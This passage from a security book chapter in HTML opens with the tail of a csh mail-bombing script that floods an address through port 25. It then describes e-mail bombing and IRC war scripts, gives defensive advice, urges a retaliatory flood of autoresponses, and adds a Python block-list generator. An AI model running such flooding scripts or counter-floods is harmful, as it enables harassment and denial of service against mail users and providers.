ch14.htm

From "Maximum Security (First Edition)" · HTM source · 1,271 lines in total · page 1 of 5
echo quote data &gt;&gt; teltemp
echo quote . &gt;&gt; teltemp
echo quote quit &gt;&gt; teltemp
echo quit &gt;&gt; teltemp
echo -n &quot;How many times should it be sent ?&quot;
set amount = $&lt;
set loop_count = 1
while ($loop_count &lt;= $amount)
    echo &quot;Done $loop_count&quot;
    ftp -n $server 25 &lt; teltemp
    @ loop_count++
end
rm ./teltemp
echo $amount e-mails complete to $name from $from@$server
# --------------------
# MailBomb by CyBerGoAT</FONT></PRE>

<H3><FONT COLOR="#000077"><B>Bombtrack</B></FONT></H3>

<P>The Bombtrack utility is reportedly the first mail-bombing tool written for the Macintosh platform. (This is of some significance. Programming a garden-variety utility like this on the Microsoft Windows platform is simple, and can be accomplished almost entirely with a visual design interface. Very little code needs to go into it. Writing for the Mac platform, however, is a slightly different affair.)</P>

<P>Basically, Bombtrack is another run-of-the-mill bombing utility, widely available at hacker sites across the Internet. The signature file for this application is</P>

<PRE><FONT COLOR="#0066FF">bombtrack.bin</FONT></PRE>

<H3><FONT COLOR="#000077"><B>FlameThrower</B></FONT></H3>

<P>FlameThrower is a bombing utility written for Macintosh. Its main purpose is list linking; it allows the user to subscribe his target to 100 lists. The binary is quite large, considering its intended purpose. The author should get some credit for style of design, but Macintosh users are fairly stylish as a rule. The signature for this file is</P>

<PRE><FONT COLOR="#0066FF">flamethrower10b.sit.bin</FONT></PRE>

<H3><FONT COLOR="#000077"><B>General Information About E-Mail Bombs</B></FONT></H3>

<P>E-mail bombing is nothing more than nuisance material. The cure is generally a kill file or an exclusionary scheme. An <I>exclusionary scheme</I> is where you bar entry of packets received from the source address. As discussed in Chapter 13, &quot;Techniques to Hide One's Identity,&quot; obtaining the source address is a fairly simple process, at least in a UNIX environment. Really, it involves no more than reading the message in Mail as opposed to Pine or Elm; this will reveal the actual source address and expand the path. Examining the complete path (even in Netscape Navigator, for example) will give you the originating mail server.</P>

<P>If you maintain a site and malicious users from the void start bombing you, contact their postmaster. This is usually quite effective; the user will be counseled that this behavior is unnecessary and that it will not be tolerated. In most cases, this proves to be a sufficient deterrent. (Some providers are even harsh enough to terminate the account then and there.) However, if you are faced with a more difficult situation (for example, the ISP couldn't care less if its users bombed the Internet collectively), you might have to take more aggressive measures.</P>

<P>One such measure is to block traffic from the originating network at the router level. (There are various packet-filtering techniques that you can apply.) However, if this doesn't suit your needs (or your temperament), there are other, more proactive solutions. One fine technique that's guaranteed to work is this: Fashion a script that catches the offending e-mail address each time it connects to your mail server. For each such connection request, terminate the connection and autorespond with a polite, 10-page advisory on how such attacks violate acceptable use policies and that, under certain circumstances, they may violate the law. After the offending party has received 1,000 or so returns of this nature, his previously unconcerned provider will bring the offender onto the carpet and promptly chop off his fingers.</P>

<P>There are renegade providers around, and there is absolutely no reason that you cannot undertake such action. After all, you have done no more than refuse the connection and issue an advisory. It is hardly your fault if the warning was not heeded. Notwithstanding various pieces of legislation to bring the Internet into the civilized world, it is still much like the Old West. If another provider refuses to abide by the law and generally accepted practices, take it down to the OK Corral. One last point here: To make this technique especially effective, be sure to CC the postmaster of the bomber's site with each autorespond message.</P>

<BLOCKQUOTE>
<P><HR><FONT COLOR="#000077"><B>NOTE:</B></FONT> These aggressive techniques can only be implemented in the event of a garden-variety mail-bombing situation. This will not work for list linking because list linking is a process that obscures the true origin address of the attacker. The only way to obtain that address is if the list owner (whoever is responsible for the mailing list server) runs logging utilities and actually keeps those logs.</P>
<P>For example, suppose the list accepts subscription requests from a Web page. It can easily obtain the address by checking the HTTP server connection log (this file is normally called <TT>access.log</TT>). HTTP servers record the originating IP address of each connection. However, the large majority of lists do not accept subscription requests through their Web pages. Instead, they use garden-variety mail. The percentage of system administrators who heavily log connection requests to their mail server is fairly small. Moreover, to trace the attacker, you would need help from more than just the system administrator at the mail list site; suppose the attacker was using a dial-up connection with a dynamically allocated IP address. After you acquire that IP from the mail-list system administrator, you must convince the attacker's ISP to cooperate by forwarding its logs to you.</P>
<P>Furthermore, unless the attacker's ISP is running good logging utilities, the logs you receive will only demonstrate a list of possible suspects (the users who were logged to that IP or dial-up at the hour of the attack). Even more research may be required. For this reason, list linking has become far more popular than run-of-the-mill mail bombing.</P>
<HR></BLOCKQUOTE>

<H3><FONT COLOR="#000077"><B>IRC: Flash Bombs and War Scripts</B></FONT></H3>

<P>Flash utilities (also referred to as <I>flash bombs</I>) belong to a class of munitions that are used on Internet Relay Chat (IRC). IRC is the last free frontier because it is spontaneous and uncontrollable. It consists of people chatting endlessly, from virtual channel to virtual channel. There is no time for advertisements, really, and even if you tried to push your product there, you would likely be blown off the channel before you had a chance to say much of anything.</P>

<P>In this respect, IRC is different from any other networked service on the Internet. IRC is grass roots and revolutionary Internet at its best (and worst), and in all likelihood, it will remain that way forever.</P>

<P>IRC was developed in Finland in the late 1980s. Some suggest that its purpose was to replace other networking tools of a similar ilk (for example, the talk service in UNIX). Talk is a system whereby two individuals can communicate on text-based terminals. The screens of both users split into two parts, one for received text and one for sent text. In this respect, talk operates a lot like a direct link between machines using any of the popular communications packages available on the market (Qmodem and ProComm Plus are good examples). The major difference is that talk occurs over the Internet; the connection is bound by e-mail address. For example, to converse with another party via talk, you issue a command as follows:</P>

<PRE><FONT COLOR="#0066FF">talk person@provider.com</FONT></PRE>

<P>This causes the local talk program to contact the remote talk daemon. If the person is available (and hasn't disabled incoming connections via talk), the screen soon splits and the conversation begins.</P>

<P>IRC differs from talk in that many people can converse at the same time. This was a major innovation, and IRC chatting has become one of the most popular methods of communication on the Net.</P>

<BLOCKQUOTE>
<P><HR><FONT COLOR="#000077"><B>NOTE:</B></FONT> IRC is one of the few places on the Internet where an individual can successfully evade even advanced detection techniques. For instance, many software pirates and crackers frequent IRC. If they are extremely paranoid, they change servers and screen names every half hour or so. Moreover, they often create their own channels instead of frequenting those already available. Finally, file transfers can be done over IRC, directly from point A to point B. No record is left of such a transfer. This differs from other types of transfers that may be closely logged. Similar types of transfers can also be made if at least one of the parties is running servers such as FTP, HTTP, or Gopher. However, IRC allows such a transfer without server software running on either box.</P>
<HR></BLOCKQUOTE>

<P>Internet warfare (that is, &quot;hand-to-hand&quot; combat) often occurs on IRC because IRC is lawless--a place where almost anything goes. Briefly, it works like this: Once connected to an IRC server, a user can go into a series of channels called <I>chat spaces</I>. Inside each channel, there is an <I>operator</I>, or a person who has some authority--authority, for example, to &quot;kick&quot; any user forwarding information that the operator deems objectionable. (<I>Kicking</I> is where the target is bumped from the channel and is forced to reconnect.) The operator can also ban a user from the channel, either temporarily or semi-permanently.</P>

<BLOCKQUOTE>
<P><HR><FONT COLOR="#000077"><B>NOTE:</B></FONT> The first person to connect to (or create) an empty channel is automatically the operator by default. Unless he voluntarily relinquishes that authority, he has complete control of the channel and can institute kick or ban actions against anyone who subsequently joins the channel.</P>
<HR></BLOCKQUOTE>

<P>As you might expect, people who get kicked or banned often respond angrily. This is where combat begins. Since the introduction of IRC, dozens of munitions have been developed for use in IRC combat. They are described in the following sections.</P>

<H4><FONT COLOR="#000077"><TT>crash.irc</TT></FONT></H4>

<P>Although not originally designed for it, <TT>crash.irc</TT> will blow a Netcom target out of IRC. In other words, an attacker uses this utility to force a Netcom user from a channel (Netcom is a very large ISP located in northern California).</P>

<H4><FONT COLOR="#000077"><TT>botkill2.irc</TT></FONT></H4>

<P>The <TT>botkill2.irc</TT> script kills bots. <I>Bots</I> are other automated scripts that run in the IRC environment.</P>

<H4><FONT COLOR="#000077"><B>ACME</B></FONT></H4>

<P>ACME is a typical &quot;war&quot; script. Its features include flooding (where you fill the channel with garbage, thereby denying others the ability to communicate) and the ability to auto-kick someone from a channel.</P>

<BLOCKQUOTE>
<P><HR><FONT COLOR="#000077"><B>NOTE:</B></FONT> Flooding can deny other users access simply because of the volume of text run through the server. It works like this: The attacker unleashes a flooding utility that generates many, many lines of text. This text is printed across the terminals of all users currently logged to the channel. Because this text saturates the write-ahead buffer of all client programs, the victims must wait for the flood to stop before they can type any further messages. Interestingly, many flood scripts actually fashion images from various text characters. If you watch such a flood for a moment, you will see some type of image develop. This activity is similar to ASCII art, which is now a popular form of artistic expression on text-based terminals that cannot display actual graphics. Of course, flooding is very irritating and therefore, few users are willing to tolerate it, even if the art that results is attractive.</P>
<HR></BLOCKQUOTE>

<H4><FONT COLOR="#000077"><B>Saga</B></FONT></H4>

<P>Saga is a sophisticated and complex script; it performs more functions than those used in combat. The main features are that it can</P>
<UL>
<LI>Kick and ban a target, for either a specified time period or 30-90 seconds</LI>
<LI>Strip an operator of his authoritative status</LI>
<LI>Screen out all users from a given domain</LI>
<LI>Blow all users from the channel</LI>
<LI>Enter a channel and kill all operators (this is called <I>takeover mode</I>)</LI>
</UL>

<H4><FONT COLOR="#000077"><B>THUGS</B></FONT></H4>

<P>THUGS is another war script. It blows various client programs from IRC, kicks unwanted users, seizes control of a channel, and hangs at least one known Windows IRC program.</P>

<H4><FONT COLOR="#000077"><B>The 7th Sphere</B></FONT></H4>

<P>Another war script worth mentioning is The 7th Sphere. The help file describes the utility as &quot;An Equal Opportunity Destroyer.&quot; Here are some of its capabilities:</P>
<UL>
<LI>Blow everyone from a channel</LI>
<LI>Incisive user flooding (selectively flood only one or more users as opposed to the entire channel)</LI>
<LI>Colliding capabilities (the capability to cause a collision of nicknames on IRC servers, thereby knocking a user with an identical nickname from IRC)</LI>
<LI>Armor (prevents you from falling victim to another war script)</LI>
<LI>Nuke facility (enables you to attack and successfully disable those using Windows IRC clients)</LI>
<LI>Built-in port scanner</LI>
</UL>
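<P>The e-mail bomb section above prescribes a kill file or exclusionary scheme keyed on the bomber's source address. The following added example (not from the book) shows how a mail administrator might derive that list: it parses constructed, sendmail-style log lines, flags any sender whose message rate exceeds a threshold within a sliding window, and renders the sender plus originating relay IPs as an exclusion list. The log format, hosts, addresses and thresholds are all assumptions.</P>

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines in a sendmail-like shape; format and addresses are assumptions.
SAMPLE_LOG = """\
Mar 01 10:00:01 mx sm-mta[201]: from=<bomber@renegade.example>, relay=mail.renegade.example [192.0.2.10]
Mar 01 10:00:03 mx sm-mta[202]: from=<bomber@renegade.example>, relay=mail.renegade.example [192.0.2.10]
Mar 01 10:00:04 mx sm-mta[203]: from=<alice@friendly.example>, relay=smtp.friendly.example [198.51.100.7]
Mar 01 10:00:05 mx sm-mta[204]: from=<bomber@renegade.example>, relay=mail.renegade.example [192.0.2.10]
Mar 01 10:00:09 mx sm-mta[205]: from=<bomber@renegade.example>, relay=mail.renegade.example [192.0.2.10]
Mar 01 10:00:12 mx sm-mta[206]: from=<bomber@renegade.example>, relay=mail.renegade.example [192.0.2.10]
Mar 01 10:02:40 mx sm-mta[207]: from=<bomber@renegade.example>, relay=mail.renegade.example [192.0.2.11]
Mar 01 10:30:00 mx sm-mta[208]: from=<alice@friendly.example>, relay=smtp.friendly.example [198.51.100.7]
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d\d \d\d:\d\d:\d\d) \S+ \S+: from=<(?P<sender>[^>]*)>, "
    r"relay=(?P<relay>\S+) \[(?P<ip>[^\]]+)\]")

def parse_log(text):
    """Turn each matching log line into a dict with timestamp, sender, relay host and IP."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # lines without a from=/relay= pair are ignored
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            events.append({"ts": ts, "sender": m["sender"], "relay": m["relay"], "ip": m["ip"]})
    return events

def find_bombers(events, threshold=5, window=timedelta(minutes=10)):
    """Flag a sender once `threshold` messages fall inside any `window`;
    report the sender's total count and the relay IPs that delivered them."""
    by_sender = defaultdict(list)
    for ev in events:
        by_sender[ev["sender"]].append(ev)
    flagged = {}
    for sender, evs in by_sender.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):  # sliding window over sorted timestamps
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[sender] = {"count": len(evs), "ips": sorted({e["ip"] for e in evs})}
                break
    return flagged

def kill_file(flagged):
    """Render the exclusionary list: one 'sender<TAB>ip' line per originating IP."""
    return "\n".join(f"{s}\t{ip}" for s in sorted(flagged) for ip in flagged[s]["ips"])
```

<P>The output of <TT>kill_file</TT> is the list a mail-server or router filter would consume; a legitimate correspondent with two messages half an hour apart is left alone.</P>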
